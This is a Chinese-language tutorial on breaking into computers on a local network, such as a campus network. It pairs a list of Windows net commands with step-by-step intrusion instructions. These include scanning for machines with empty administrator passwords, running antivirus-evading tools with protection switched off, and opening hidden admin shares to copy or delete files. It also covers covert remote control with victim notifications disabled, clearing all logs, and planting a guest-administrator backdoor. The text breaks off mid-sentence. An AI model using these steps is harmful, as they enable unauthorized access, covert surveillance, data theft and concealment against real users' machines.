请教如何侵入局域网内的一台计算机

使用Windows命令行工具进行网络共享、用户管理、服务控制等多种操作的方法，适合那些需要深入了解Windows系统网络功能的用户。如果您对Windows系统的网络管理感兴趣，或者需要学习如何进行内网渗透和安全测试，这篇文章将提供给您丰富的实践知识。

netuse\\ip\ipc$密码/user:用户名建立IPC非空链接

netuseh:\\ip\c$密码/user:用户名直接登陆后映射对方C：到本地为H:

netuseh:\\ip\c$登陆后映射对方C：到本地为H:

netuse\\ip\ipc$/del删除IPC链接

netuseh:/del删除映射对方到本地的为H:的映射

netuser用户名密码/add建立用户

netuserguest/active:yes激活guest用户

netuser查看有哪些用户

netuser帐户名查看帐户的属性

netlocalgroupadministrators用户名/add把用户添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

netstart查看开启了哪些服务

netstart服务名开启服务；(如:netstarttelnet，netstartschedule)

netstop服务名停止某服务

nettime\\目标ip查看对方时间

nettime\\目标ip/set设置本地计算机时间与目标IP主机的时间同步,加上参数/yes可取消确认信息

netview查看本地局域网内开启了哪些共享

netview\\ip查看对方局域网内开启了哪些共享

netconfig显示系统网络设置

netlogoff断开连接的共享

netpause服务名暂停某服务

netsendip文本信息向对方发信息

netver局域网内正在使用的网络连接类型和信息

netshare查看本地开启的共享

netshareipc$开启ipc$共享

netshareipc$/del删除ipc$共享

netsharec$/del删除C：共享

netuserguest12345用guest用户登陆后用将密码改为12345

netpassword密码更改系统登陆密码

netstat-a查看开启了哪些端口,常用netstat-an

netstat-n查看端口的网络连接情况，常用netstat-an

netstat-v查看正在进行的工作

netstat-p协议名例：netstat-ptcq/ip查看某协议使用情况（查看tcp/ip协议使用情况）

netstat-s查看正在使用的所有协议使用情况

nbtstat-Aip对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert-参数ip(或计算机名)跟踪路由（数据包），参数：-w数字用于设置超时间隔。

pingip(或域名)向对方主机发送默认大小为32字节的数据，参数：-l[空格]数据包大小；-n发送数据次数；-t指一直ping。

ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址，ipconfig可用参数/all显示全部配置信息

tlist-t以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill-F进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如DEL/AR*.*表示删除当前目录下所有只读文件，DEL/A-S*.*表示删除当前目录下除系统文件以外的所有文件

1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网；

2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了139端口，但没开防火墙的机子。

入侵工具：

一般要用到三个：NTscan变态扫描器，Recton--D贺免杀专用版，DameWare迷你中文版4.5.（前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。）

入侵步骤：

1.使用NTscan变态扫描器，在IP处填上要扫描的IP范围，选择WMI扫描方式，按开始后就等扫描结果了。

2.使用Recton--D贺免杀专用版

选择CMD命令项，在CMD:中输入netshareC$=C:\，即可开启远程主机的C盘共享，以此将C换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入\\对方IP\C$，即可进入对方C盘。

选择Telnet项，在远程主机中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在CMD选项中，执行命令：netshareipc$,接着执行：netshareadmin$,最后执行netuse\\***.***.***.***\IPC$/user：administrator在*处填入你入侵的主机IP。

3.使用DameWare迷你中文版4.5，安装后点DameWareMiniRemoteControl，在帮助项中选择激活产品，输入注册信息，成功注册后，进入远程连接窗口，在主机处填入IP地址，点设置，在服务安装选项中点编辑后,在通知对话框中去掉连接时通知,在附加设置中全都不选，在用户选项中去掉启用用户选项菜单。设置完成好后，就可点连接，在弹出的对话框中点确定后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

入侵步骤补充：

1.在以上第2步中，远程启动Telnet服务可以通过我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动完成。

2.Recton--D贺免杀专用版还有其他功能，在进程项中，可以查看远程主机的进程，并可任意结束其中进程；在共享项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：\,D：\等，共享好后在地址栏中输入\\IP\C$,进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。最后选日志清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先telnetIP,telnet上去,键入y后输入的用户名administrator,密码为空,进入后，开共享用netshare命令，共享C$(即C盘)：netshareC$=C：,共享system文件夹：netsharec=c：\winnt\system32,共享IPC$用：netshareIPC$等,最后是关闭共享，关闭C盘共享：netshareC$/del。

4.为方便下次入侵，可以设置后门，查看用户：netuser,激活guest用户

netuserguest/active：yes,更改guest的密码为poco：netuserguestpoco,把guest的权限提升为管理员权限：netlocalgroupadministratorsguest/add。

5.telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：dird：\,查看C盘programfile文件夹：dirc：\PROGRA~1\;,60秒倒记时关机：shutdown-s-t60

补充说明：

1.netuse错误原因解决：

(1).发生系统错误1326。登录失败：未知的用户名或错误密码。

在远程机的控制面板-文件夹选项-查看-简单的文件共享,去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为guest连接，是无法访问C$等管理共享的.

(2)发生系统错误1327。登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。在远程机的控制面板－管理工具－本地安全策略－安全选项－用户权限指派里，禁用空密码用户只能进行控制台登陆.

(3)//IP/c$时提示找不到网络途径。在网络和拨号连接中本地连接中选取Internet协议(TCP/IP)属性，进入高级TCP/IP设置选WINS设置里面有一项启用TCP/IP的NETBIOS